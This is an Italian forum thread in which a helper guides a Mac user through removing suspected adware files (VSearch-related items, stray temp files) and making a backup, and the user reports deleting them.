Messaggio Inviato: dom, 05 giu 2016 12:37

faxus ha scritto:Il resto appare ora decente.

Con calma faremo un po' di pulizia.
Oggi ho molto da fare.

Intanto, però, subito:
Elimina il software Panasonic, se proprio ti serve dopo lo potrai reinstallare aggiornato e compatibile.
Il software TeamViewer
viewtopic.php?f=2&t=37927" onclick="window.open(this.href);return false;

Poi fai un bel backup, come hai promesso.
Il resto dopo


EDIT, vedo il tuo messaggio!

La mia cartella top è vuota.
Mi sembra tutto sospetto il contenuto.
Sicuramente sono fasulli da copiare in una cartella per me e da eliminare:

_MACOS
VsInstaller di tutti i tipi
com.vsearch.sock
tutti i tmp sfusi e icl

Non so la cartella launchd (che non dovrebbe stare lì)
Ma è protetta, vedi se riesci a vedere il contenuto aprendola con i permessi di amministrazione

Poi indaga sul contenuto di systemstats
sia la cartella launchhd che systemstats è vuota, quindi le ho buttate assieme al resto
ho buttato anche updt.txt che contenevadel testo con i nomi incriminati
Rispondi